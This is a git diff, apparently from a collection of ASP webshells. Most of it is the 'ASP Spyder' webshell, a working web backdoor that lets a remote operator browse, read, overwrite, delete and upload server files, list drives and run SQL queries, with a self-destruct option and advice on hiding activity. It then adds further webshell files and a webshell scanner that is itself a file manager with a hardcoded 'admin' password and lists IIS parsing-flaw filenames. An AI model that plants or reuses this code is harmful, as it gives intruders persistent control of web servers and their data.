|
||||||
|
</td></tr></table>
|
||||||
|
<table><tr><td><%If Request.Form("chkXML") = "on" Then getXML(myQuery) Else getTable(myQuery) %></td></tr></table></form>
|
||||||
|
<HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=-1 color=gray>Cheers to <a href="mailto:hAshish@shagzzz.cjb.net">hAshish</a> for all the help!</font></p><BR>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
<%
|
||||||
|
set myDBConnection = nothing
|
||||||
|
set rs2 = nothing
|
||||||
|
set rs = nothing
|
||||||
|
'-------------
|
||||||
|
response.End()
|
||||||
|
end if
|
||||||
|
'QUERY ANALYSER -- STOP
|
||||||
|
%>
|
||||||
|
<title><%=MyPath%></title>
|
||||||
|
</head>
|
||||||
|
<body bgcolor=black text=white topAprgin="0">
|
||||||
|
<!-- Copyright Vela iNC. Apr2003 [www.shagzzz.cjb.net] Coded by ~sir_shagalot -->
|
||||||
|
<%
|
||||||
|
Response.Flush
|
||||||
|
'Code Optimisation START
|
||||||
|
select case request.form("cmd")
|
||||||
|
case ""
|
||||||
|
If request.form("dirStuff")<>"" then
|
||||||
|
Response.write "<font face=arial size=-2>You need to click [Create] or [Delete] for folder operations to be</font>"
|
||||||
|
Else
|
||||||
|
Response.Write "<font face=webdings size=+3 color=#ff8300>آ</font>"
|
||||||
|
End If
|
||||||
|
case " Copy "
|
||||||
|
' ---Copy From Folder routine Start
|
||||||
|
If Request.Form("Fname")="" then
|
||||||
|
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\???</font><BR>"
|
||||||
|
err.number=424
|
||||||
|
Else
|
||||||
|
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\" & Request.Form("Fname") & "</font><BR>"
|
||||||
|
fso.CopyFile Request.QueryString("txtpath") & "\" & Request.Form("Fname"),Target & Request.Form("Fname")
|
||||||
|
Response.Flush
|
||||||
|
End If
|
||||||
|
' ---Copy From Folder routine Stop
|
||||||
|
case " Copy "
|
||||||
|
' ---Copy Too Folder routine Start
|
||||||
|
If Request.Form("ToCopy")<>"" and Request.Form("ToCopy") <> "------------------------------" Then
|
||||||
|
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\" & Request.Form("ToCopy") & "</font><BR>"
|
||||||
|
Response.Flush
|
||||||
|
fso.CopyFile Target & Request.Form("ToCopy"), Request.Form("txtpath") & "\" & Request.Form("ToCopy")
|
||||||
|
Else
|
||||||
|
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\???</font><BR>"
|
||||||
|
err.number=424
|
||||||
|
End If
|
||||||
|
' ---Copy Too Folder routine Stop
|
||||||
|
case "Delete" 'two of this
|
||||||
|
if request.form("todelete")<>"" then
|
||||||
|
' ---File Delete start
|
||||||
|
If (Request.Form("ToDelete")) = myScriptName then'(Right(Request.Servervariables("SCRIPT_NAME"),len(Request.Servervariables("SCRIPT_NAME"))-1)) Then
|
||||||
|
Response.Write "<center><font face=arial size=-2 color=#ff8300><BR><BR><HR>SELFDESTRUCT INITIATED...<BR>"
|
||||||
|
Response.Flush
|
||||||
|
fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
|
||||||
|
%>+++DONE+++</font><BR><HR>
|
||||||
|
<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
|
||||||
|
<%Response.End
|
||||||
|
End If
|
||||||
|
If Request.Form("ToDelete") <> "" and Request.Form("ToDelete") <> "------------------------------" Then
|
||||||
|
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\" & Request.Form("ToDelete") & "</font><BR>"
|
||||||
|
Response.Flush
|
||||||
|
fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
|
||||||
|
Else
|
||||||
|
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\???</font><BR>"
|
||||||
|
err.number=424
|
||||||
|
End If
|
||||||
|
' ---File Delete stop
|
||||||
|
Else If request.form("dirStuff")<>"" then
|
||||||
|
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting folder...</font><BR>"
|
||||||
|
fso.DeleteFolder MyPath & "\" & request.form("DirName")
|
||||||
|
end if
|
||||||
|
End If
|
||||||
|
|
||||||
|
case "Edit/Create"
|
||||||
|
%>
|
||||||
|
<center><BR><table bgcolor="#505050" cellpadding="8"><tr>
|
||||||
|
<td bgcolor="#000000" valign="bottom">
|
||||||
|
<Font face=arial SIZE=-2 color=#ff8300>NOTE: The following edit box maynot display special characters from files. Therefore the contents displayed maynot be considered correct or accurate.</font>
|
||||||
|
</td></tr><tr><td><TT>Path=> <%=pathname%><BR><BR>
|
||||||
|
<%
|
||||||
|
' fetch file information
|
||||||
|
Set f = fso.GetFile(pathname)
|
||||||
|
%>
|
||||||
|
file Type: <%=f.Type%><BR>
|
||||||
|
file Size: <%=FormatNumber(f.size,0)%> bytes<BR>
|
||||||
|
file Created: <%=FormatDateTime(f.datecreated,1)%> <%=FormatDateTime(f.datecreated,3)%><BR>
|
||||||
|
last Modified: <%=FormatDateTime(f.datelastmodified,1)%> <%=FormatDateTime(f.datelastmodified,3)%><BR>
|
||||||
|
last Accessed: <%=FormatDateTime(f.datelastaccessed,1)%> <%=FormatDateTime(f.datelastaccessed,3)%><BR>
|
||||||
|
file Attributes: <%=f.attributes%><BR>
|
||||||
|
<%
|
||||||
|
Set f = Nothing
|
||||||
|
response.write "<center><FORM action=""" & Request.Servervariables("SCRIPT_NAME") & "?txtpath=" & MyPath & """ METHOD=""POST"">"
|
||||||
|
'read the file
|
||||||
|
Set f = fso.OpenTextFile(pathname)
|
||||||
|
If NOT f.AtEndOfStream Then fstr = f.readall
|
||||||
|
f.Close
|
||||||
|
Set f = Nothing
|
||||||
|
Set fso = Nothing
|
||||||
|
response.write "<TABLE><TR><TD>" & VBCRLF
|
||||||
|
response.write "<FONT TITLE=""Use this text area to view or change the contents of this document. Click [Save As] to store the updated contents to the web server."" FACE=arial SIZE=1 ><B>DOCUMENT CONTENTS</B></FONT><BR>" & VBCRLF
|
||||||
|
response.write "<TEXTAREA NAME=FILEDATA ROWS=16 COLS=85 WRAP=OFF>" & Server.HTMLEncode(fstr) & "</TEXTAREA>" & VBCRLF
|
||||||
|
response.write "</TD></TR></TABLE>" & VBCRLF
|
||||||
|
%>
|
||||||
|
<BR><center><TT>LOCATION <INPUT TYPE="TEXT" SIZE=48 MAXLENGTH=255 NAME="PATHNAME" VALUE="<%=pathname%>">
|
||||||
|
<INPUT TYPE="SUBMIT" NAME=cmd VALUE="Save As" TITLE="This write to the file specifed and overwrite it without warning.">
|
||||||
|
<INPUT TYPE="SUBMIT" NAME="POSTACTION" VALUE="Cancel" TITLE="If you recieve an error while saving, then most likely you do not have write access OR the file attributes are set to readonly !!">
|
||||||
|
</FORM></td></tr></table><BR>
|
||||||
|
<%
|
||||||
|
response.end
|
||||||
|
|
||||||
|
case "Create"
|
||||||
|
Response.Write "<font face=arial size=-2 color=#ff8300>Creating folder...</font><BR>"
|
||||||
|
fso.CreateFolder MyPath & "\" & request.form("DirName")
|
||||||
|
|
||||||
|
case "Save As"
|
||||||
|
Response.Write "<font face=arial size=-2 color=#ff8300>Saving file...</font><BR>"
|
||||||
|
Set f = fso.CreateTextFile(Request.Form("pathname"))
|
||||||
|
f.write Request.Form("FILEDATA")
|
||||||
|
f.close
|
||||||
|
end select
|
||||||
|
'Code Optimisation STOP
|
||||||
|
' ---DRIVES start here
|
||||||
|
If request.querystring("getDRVs")="@" then
|
||||||
|
%>
|
||||||
|
<BR><BR><BR><center><table bgcolor="#505050" cellpadding=4>
|
||||||
|
<tr><td><Font face=arial size=-1>Available Drive Information:</font>
|
||||||
|
</td></tr><tr><td bgcolor=black >
|
||||||
|
<table><tr><td><tt>Drive</td><td><tt>Type</td><td><tt>Path</td><td><tt>ShareName</td><td><tt>Size[MB]</td><td><tt>ReadyToUse</td><td><tt>VolumeLabel</td><td></tr>
|
||||||
|
<%For Each thingy in fso.Drives%>
|
||||||
|
<tr><td><tt>
|
||||||
|
<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thingy.Path%> </td><td><tt> <%=thingy.ShareName%> </td><td><tt> <%=((thingy.TotalSize)/1024000)%> </td><td><tt> <%=thingy.IsReady%> </td><td><tt> <%=thingy.VolumeName%>
|
||||||
|
<%Next%>
|
||||||
|
</td></tr></table>
|
||||||
|
</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
|
||||||
|
<%
|
||||||
|
Response.end
|
||||||
|
end if
|
||||||
|
' ---DRIVES stop here
|
||||||
|
%>
|
||||||
|
<HEAD>
|
||||||
|
<SCRIPT Language="VBScript">
|
||||||
|
sub getit(thestuff)
|
||||||
|
if right("<%=showPath%>",1) <> "\" Then
|
||||||
|
document.myform.txtpath.value = "<%=showPath%>" & "\" & thestuff
|
||||||
|
Else
|
||||||
|
document.myform.txtpath.value = "<%=showPath%>" & thestuff
|
||||||
|
End If
|
||||||
|
document.myform.submit()
|
||||||
|
End sub
|
||||||
|
</SCRIPT>
|
||||||
|
</HEAD>
|
||||||
|
<%
|
||||||
|
'---Report errors
|
||||||
|
select case err.number
|
||||||
|
case "0"
|
||||||
|
response.write "<font face=webdings color=#55ff55>i</font> <font face=arial size=-2>Successfull..</font>"
|
||||||
|
|
||||||
|
case "58"
|
||||||
|
response.write "<font face=arial size=-1 color=red>Folder already exists OR no folder name specified...</font>"
|
||||||
|
|
||||||
|
case "70"
|
||||||
|
response.write "<font face=arial size=-1 color=red>Permission Denied, folder/file is readonly or contains such files...</font>"
|
||||||
|
|
||||||
|
case "76"
|
||||||
|
response.write "<font face=arial size=-1 color=red>Path not found...</font>"
|
||||||
|
|
||||||
|
case "424"
|
||||||
|
response.write "<font face=arial size=-1 color=red>Missing, Insufficient data OR file is readonly...</font>"
|
||||||
|
|
||||||
|
case else
|
||||||
|
response.write "<font face=arial size=-1 color=red>" & err.description & "</font>"
|
||||||
|
|
||||||
|
end select
|
||||||
|
'---Report errors end
|
||||||
|
%>
|
||||||
|
<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
|
||||||
|
<font face=Courier>
|
||||||
|
<table><tr><td>
|
||||||
|
<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" name="myform" >
|
||||||
|
<Table bgcolor=#505050 ><tr><td bgcolor=#505050 >
|
||||||
|
<font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> <%=drv.VolumeName%> </td></tr>
|
||||||
|
<tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color=gray>Virtual: http://<%=Request.ServerVariables("SERVER_NAME")%><%=Request.Servervariables("SCRIPT_NAME")%></Font><BR><font face=wingdings color=Gray >1</font><font face=Arial size=+1 > <%=showPath%></Font>
|
||||||
|
<BR><input type=text width=40 size=60 name=txtpath value="<%=showPath%>" ><input type=submit name=cmd value=" View " >
|
||||||
|
</td></tr></form></table>
|
||||||
|
</td><td><center>
|
||||||
|
<table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?getDRVs=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>Retrieve Available Network Drives</a></td></tr>
|
||||||
|
<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>SQL Query Analyser</A></td></tr>
|
||||||
|
<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?logoff=@&...thankyou.for.using.ASpyder....~sir_shagalot!..[shagzzz.cjb.net]"><font size=-2 face=arial>+++LOGOFF+++</A></td></tr></table>
|
||||||
|
</td></tr></table>
|
||||||
|
<p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td>
|
||||||
|
<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" ><font face=arial size=-1 >Delete file from current directory:</font><BR>
|
||||||
|
<select size=1 name=ToDelete >
|
||||||
|
<option>------------------------------</option>"
|
||||||
|
<%
|
||||||
|
fi=0
|
||||||
|
For each file in folder.Files
|
||||||
|
Response.Write "<option>" & file.name & "</option>"
|
||||||
|
fi=fi+1
|
||||||
|
next
|
||||||
|
Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=Delete ></form></td><td>"
|
||||||
|
Response.Write "<form method=post name=frmCopyFile action=""" & Request.Servervariables("SCRIPT_NAME") & """ ><font face=arial size=-1 >Copy file too current directory:</font><br><select size=1 name=ToCopy >"
|
||||||
|
Response.Write "<option>------------------------------</option>"
|
||||||
|
For each file in fileCopy.Files
|
||||||
|
Response.Write "<option>" & file.name & "</option>"
|
||||||
|
next
|
||||||
|
Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value="" Copy "" ></form></td></tr></Table>"
|
||||||
|
Response.Flush
|
||||||
|
' ---View Tree Begins Here
|
||||||
|
Response.Write "<table Cellpading=2 width=75% bgcolor=#505050 ><tr><td valign=top width=50% bgcolor=#303030 >Folders:<BR><BR>"
|
||||||
|
fo=0
|
||||||
|
Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#c8c8c8><span style='cursor: hand;' OnClick=""getit('..')"">..</span></FONT><BR>"
|
||||||
|
|
||||||
|
For each fold in folder.SubFolders '-->FOLDERz
|
||||||
|
fo=fo+1
|
||||||
|
Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick=""getit('" & fold.name & "')"">" & fold.name & "</span></FONT><BR>"
|
||||||
|
Next
|
||||||
|
%>
|
||||||
|
<BR><center><form method=post action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
|
||||||
|
<table bgcolor=#505050 cellspacing=4><tr><td>
|
||||||
|
<font face=arial size=-1 title="Create and Delete folders by entering their names here manually.">Directory:</td></tr>
|
||||||
|
<tr><td align=right ><input type=text size=20 name=DirName><BR>
|
||||||
|
<input type=submit name=cmd value=Create><input type=submit name=cmd value=Delete><input type=hidden name=DirStuff value=@>
|
||||||
|
</tr></td></table></form>
|
||||||
|
<%
|
||||||
|
Response.Write "<BR></td><td valign=top width=50% bgcolor=#303030 >Files:<BR><BR>"
|
||||||
|
Response.Flush
|
||||||
|
%>
|
||||||
|
<form method=post name=frmCopySelected action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
|
||||||
|
<%
|
||||||
|
Response.write "<center><select name=Fname size=" & fi+3 & " style=""background-color: rgb(48,48,48); color: rgb(210,210,210)"">"
|
||||||
|
For each file in folder.Files '-->FILEz
|
||||||
|
Response.Write "<option value=""" & file.name & """> " & file.name & " -- [" & Int(file.size/1024)+1 & " kb]</option>"
|
||||||
|
Next
|
||||||
|
Response.write "</select>"
|
||||||
|
Response.write "<br><input type=submit name=cmd value="" Copy ""><input type=submit name=cmd value=""Edit/Create""><input type=submit name=cmd value=Download>"
|
||||||
|
%>
|
||||||
|
</form>
|
||||||
|
<%
|
||||||
|
Response.Write "<BR></td></tr><tr><td align=center ><B>Listed: " & fo & "</b></td><td align=center ><b>Listed: " & fi & "</b></td></tr></table><BR>"
|
||||||
|
' ---View Tree Ends Here
|
||||||
|
' ---Upload Routine starts here
|
||||||
|
%>
|
||||||
|
<form method="post" ENCTYPE="multipart/form-data" action="<%=Request.Servervariables("SCRIPT_NAME")%>?upload=@&txtpath=<%=MyPath%>">
|
||||||
|
<table bgcolor="#505050" cellpadding="8">
|
||||||
|
<tr>
|
||||||
|
<td bgcolor=#303030 valign="bottom"><font size=+1 face=wingdings color=Gray >2</font><font face="Arial" size=-2 color="#ff8300"> SELECT FILES TO UPLOAD:<br>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE1"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE2"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE3"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE4"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE5"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE6"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE7"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE8"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE9"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE10"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE11"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE12"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE13"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE14"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE15"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE16"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE17"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE18"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE19"><BR>
|
||||||
|
<input TYPE="FILE" SIZE="53" NAME="FILE20"><BR>
|
||||||
|
|
||||||
|
<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="If you recieve an error while uploading, then most likely you do not have write access to disk !!">
|
||||||
|
</font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<BR>
|
||||||
|
<table bgcolor="#505050" cellpadding="6">
|
||||||
|
<tr>
|
||||||
|
<td bgcolor="#000000" valign="bottom"><font face="Arial" size="-2" color=gray>NOTE FOR UPLOAD -
|
||||||
|
YOU MUST HAVE VBSCRIPT v5.0 INSTALLED ON YOUR WEB SERVER FOR THIS LIBRARY TO
|
||||||
|
FUNCTION CORRECTLY. YOU CAN OBTAIN IT FREE FROM MICROSOFT WHEN YOU INSTALL INTERNET
|
||||||
|
EXPLORER 5.0 OR LATER. WHICH IS, MOST LIKELY, ALREADY INSTALLED.</font></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</form>
|
||||||
|
<%
|
||||||
|
' ---Upload Routine stops here
|
||||||
|
%>
|
||||||
|
|
||||||
|
</font><HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=1 face=arial>[ System: <%=now%> ]</font></p><BR>
|
||||||
|
</body></html>
|
513
asp/cmd.asp.txt
Normal file
513
asp/cmd.asp.txt
Normal file
File diff suppressed because one or more lines are too long
1429
asp/hididi.net.txt
Normal file
1429
asp/hididi.net.txt
Normal file
File diff suppressed because it is too large
Load diff
615
asp/killdoor.txt
Normal file
615
asp/killdoor.txt
Normal file
|
@ -0,0 +1,615 @@
|
||||||
|
<%
|
||||||
|
Dim Report
|
||||||
|
PASSWORD="admin" '密码
|
||||||
|
VERSION="" '
|
||||||
|
URL=Request.ServerVariables("URL")
|
||||||
|
FileName=Right(URL,Len(URL)-InStrRev(URL,"/"))
|
||||||
|
ServerName=Request.Servervariables("SERVER_NAME")
|
||||||
|
ServerPort=":"&Request.ServerVariables("SERVER_PORT")
|
||||||
|
WebSiteRoot=Server.MapPath("\")
|
||||||
|
CurrentlyRoot=Server.MapPath(".")
|
||||||
|
|
||||||
|
RQSact=Request.QueryString("act")
|
||||||
|
RQSFileManager=Request.QueryString("filemanager")
|
||||||
|
RQSFilePath=Request.QueryString("filepath")
|
||||||
|
|
||||||
|
If RQSact="login" Then
|
||||||
|
If Request.Form("pwd")=PASSWORD Then Session("KOA")=1
|
||||||
|
End If
|
||||||
|
|
||||||
|
Set FSO=Server.CreateObject("Scripting.FileSystemObject")
|
||||||
|
|
||||||
|
%>
|
||||||
|
<style type="text/css">
|
||||||
|
body,td,th {font-size: 12px;}
|
||||||
|
.style1 {background-color: #0033CC;}
|
||||||
|
.style2 {background-color: #FFFFFF; height:30px;}
|
||||||
|
</style>
|
||||||
|
<script type="text/javascript">
|
||||||
|
function setNone(t) {
|
||||||
|
document.getElementById('koaAsp').style.display='none';
|
||||||
|
document.getElementById('koaQT').style.display='none';
|
||||||
|
document.getElementById('koaSF').style.display='none';
|
||||||
|
document.getElementById(t).style.display='';
|
||||||
|
}
|
||||||
|
function setScanMode() {
|
||||||
|
document.getElementById("scanForm").submit();
|
||||||
|
document.getElementById('scanButton').disabled=true;
|
||||||
|
document.getElementById('scanButton').value='扫描中…';
|
||||||
|
document.getElementById('scanMode').innerHTML='正在扫描中,请耐心等待……';
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<%If Session("KOA")<>1 Then%>
|
||||||
|
<div>
|
||||||
|
<form method="post" action="?act=login">
|
||||||
|
请输入密码admin:<input name="pwd" type="password" size="15"><input type="submit" name="Submit" value="提交">
|
||||||
|
</form>
|
||||||
|
</div>
|
||||||
|
<%
|
||||||
|
Else
|
||||||
|
If RQSact<>"scan" And RQSFileManager="" Then
|
||||||
|
%>
|
||||||
|
<form action="?act=scan" method="post" name="form" id="scanForm">
|
||||||
|
<table cellspacing="1" cellpadding="0" class="style1">
|
||||||
|
<tr>
|
||||||
|
<td colspan="2" class="style2"><center><h1>KOA ASP类 WebShell扫描工具</h1></center></td>
|
||||||
|
</tr>
|
||||||
|
<tbody id="scanMode" class="style2">
|
||||||
|
<tr>
|
||||||
|
<td class="style2">
|
||||||
|
<b>输入你要检查的路径:</b><input name="path" type="text" value="\" size="30">*<br>
|
||||||
|
三种填写方法,比如“E:\wwwroot”;填“\”为整个网站;“.”为本文件所在目录
|
||||||
|
</td>
|
||||||
|
<td class="style2"><input type="button" value="开始扫描" id="scanButton" onclick="setScanMode();"></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td colspan="2" class="style2">
|
||||||
|
请选择扫描方式:
|
||||||
|
<input name="radiobutton" type="radio" value="koa" onclick="setNone('koaAsp')" checked>查木马(耗资源)
|
||||||
|
<input name="radiobutton" type="radio" value="qt" onclick="setNone('koaQT')">查找IIS解析漏洞的文件
|
||||||
|
<input name="radiobutton" type="radio" value="sf" onclick="setNone('koaSF')">搜索符合下面条件的文件
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td colspan="2" class="style2">
|
||||||
|
<b>功能说明</b>:<br>
|
||||||
|
<span id="koaAsp">
|
||||||
|
查找后缀名为asp,asa,cdx,cer,aspx等木马<br>
|
||||||
|
如果目录下文件过多,容易脚本超时。
|
||||||
|
</span>
|
||||||
|
<span id="koaQT" style="display:none">
|
||||||
|
查找IIS解析漏洞的文件,这些文件不一定是木马,需要手动查看<br>
|
||||||
|
比如"D:\WEBROOT\website\hack.asp\a.gif"或<br>
|
||||||
|
"D:\WEBROOT\website\hack.asp;.gif"一类的文件能查到
|
||||||
|
</span>
|
||||||
|
<span id="koaSF" style="display:none">
|
||||||
|
---------------------- 需将以下内容填写完整 ------------------<br><br>
|
||||||
|
查找内容:<input name="Search_Content" type="text" size="20"> 要查找的字符串,不填就只进行日期检查<br>
|
||||||
|
修改日期:<input name="Search_Date" type="text" value="<%=Left(Now(),InStrRev(now(),"-")-1)%>" size="20">* 多个日期用;隔开,任意日期填写<a href="#" onClick="javascript:form.Search_Date.value='ALL'">ALL</a><br>
|
||||||
|
文件类型:<input name="Search_FileExt" value="*" size="20">* 类型之间用,隔开,*表示所有类型
|
||||||
|
</span>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</tbody>
|
||||||
|
<tr>
|
||||||
|
<td colspan="2" class="style2">版本号:<%=VERSION%> 版权所有:<a href="http://tophack.net/">http://tophack.net/</a> 欢迎传播推广,修改请保留版权。</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</form>
|
||||||
|
<%
|
||||||
|
ElseIf RQSFileManager<>"" Then
|
||||||
|
On Error Resume Next
|
||||||
|
If RQSFileManager="delfile" Then
|
||||||
|
Call FSO.DeleteFile(RQSFilePath,True)
|
||||||
|
ChkErr(Err)
|
||||||
|
Response.Write "<script>alert('删除成功');window.open('','_self','');window.close();</script>"
|
||||||
|
ElseIf RQSFileManager="savefile" Then
|
||||||
|
FileContent=Request.Form("fileContent")
|
||||||
|
Set oFile=FSO.OpenTextFile(RQSFilePath,2,True)
|
||||||
|
oFile.Write FileContent
|
||||||
|
oFile.Close
|
||||||
|
ChkErr(Err)
|
||||||
|
Response.Write "<script>alert('修改成功');window.open('','_self','');window.close();</script>"
|
||||||
|
ElseIf RQSFileManager="editfile" Then
|
||||||
|
Set oFile=FSO.OpenTextFile(RQSFilePath)
|
||||||
|
ChkErr(Err)
|
||||||
|
FileTxt=Server.HtmlEncode(oFile.ReadAll())
|
||||||
|
%>
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="table-layout:fixed;word-break:break-all;width:100%;">
|
||||||
|
<tr>
|
||||||
|
<th>“<%=RQSFilePath%>”文件代码</th>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td><a href="?filemanager=delfile&filepath=<%=tURLEncode(RQSFilePath)%>" onClick="return confirm('确认删除?')">删除</a> <a href="#" onClick="if(confirm('确认保存修改?')){document.getElementById('saveForm').submit();}else{return false;}">保存</a> <a href="javascript:window.open('','_self','');window.close();">关闭</a> 友情提示:如果你看到下面的代码是乱码,请不要使用本程序修改文件。</td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td><form action="?filemanager=savefile&filepath=<%=tURLEncode(RQSFilePath)%>" method="post" id="saveForm"><textarea name="fileContent" style="width:1000px;height:530px;"><%=FileTxt%></textarea></form></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td><a href="?filemanager=delfile&filepath=<%=tURLEncode(RQSFilePath)%>" onClick="return confirm('确认删除?')">删除</a> <a href="#" onClick="if(confirm('确认保存修改?')){document.getElementById('saveForm').submit();}else{return false;}">保存</a> <a href="javascript:window.open('','_self','');window.close();">关闭</a></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<%
|
||||||
|
Else
|
||||||
|
Set oFile=FSO.OpenTextFile(RQSFilePath)
|
||||||
|
ChkErr(Err)
|
||||||
|
FileTxt=Server.HtmlEncode(LCase(oFile.ReadAll()))
|
||||||
|
%>
|
||||||
|
<table border="1" cellpadding="0" cellspacing="0" style="table-layout:fixed;word-break:break-all;width:100%">
|
||||||
|
<tr>
|
||||||
|
<th>“<%=RQSFilePath%>”文件代码 危险脚本已高亮加大</th>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td><a href="?filemanager=delfile&filepath=<%=tURLEncode(RQSFilePath)%>" onClick="return confirm('确认删除?')">删除</a> <a href="?filemanager=editfile&filepath=<%=tURLEncode(RQSFilePath)%>">编辑</a> <a href="javascript:window.open('','_self','');window.close();">关闭</a> 友情提示:如果你看到下面的代码是乱码,请不要使用本程序修改文件。</td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td><%=HeightLightCode(Replace(FileTxt,vbNewLine,"<br/>"))%></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td><a href="?filemanager=delfile&filepath=<%=tURLEncode(RQSFilePath)%>" onClick="return confirm('确认删除?')">删除</a> <a href="?filemanager=editfile&filepath=<%=tURLEncode(RQSFilePath)%>">编辑</a> <a href="javascript:window.open('','_self','');window.close();">关闭</a></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<%
|
||||||
|
End If
|
||||||
|
Set oFile=Nothing
|
||||||
|
Else
|
||||||
|
Server.ScriptTimeout=9999999
|
||||||
|
FormRB=Request.Form("radiobutton")
|
||||||
|
FormPath=Request.Form("path")
|
||||||
|
FormSD=Request.Form("Search_Date")
|
||||||
|
FormSFE=Request.Form("Search_FileExt")
|
||||||
|
If FormPath="" Then
|
||||||
|
Response.Write("请输入要扫描的目录<br><br><a href='"&URL&"'>返回重新输入</a>")
|
||||||
|
Response.End
|
||||||
|
End If
|
||||||
|
If FormPath="\" Then
|
||||||
|
TmpPath=WebSiteRoot
|
||||||
|
SearchType=1
|
||||||
|
ElseIf FormPath="." Then
|
||||||
|
TmpPath=CurrentlyRoot
|
||||||
|
SearchType=2
|
||||||
|
Else
|
||||||
|
TmpPath=FormPath
|
||||||
|
End If
|
||||||
|
Timer1=Timer
|
||||||
|
Sun=0
|
||||||
|
SumFiles=0
|
||||||
|
SumFolders=1
|
||||||
|
If FormRB="koa" Then
|
||||||
|
DimFileExt="asp,asa,cer,cdx,aspx,cgi,php,php3,php4,php5"
|
||||||
|
Call ShowAllFileKOA(TmpPath)
|
||||||
|
ElseIf FormRB="qt" Then
|
||||||
|
Call ShowAllFileQT(TmpPath)
|
||||||
|
Else
|
||||||
|
If FormPath="" Or FormSD="" Or FormSFE="" Then
|
||||||
|
Response.Write("条件不完全,恕难从命<br><br><a href='"&URL&"'>返回重新输入</a>")
|
||||||
|
Response.End
|
||||||
|
End If
|
||||||
|
DimFileExt=FormSFE
|
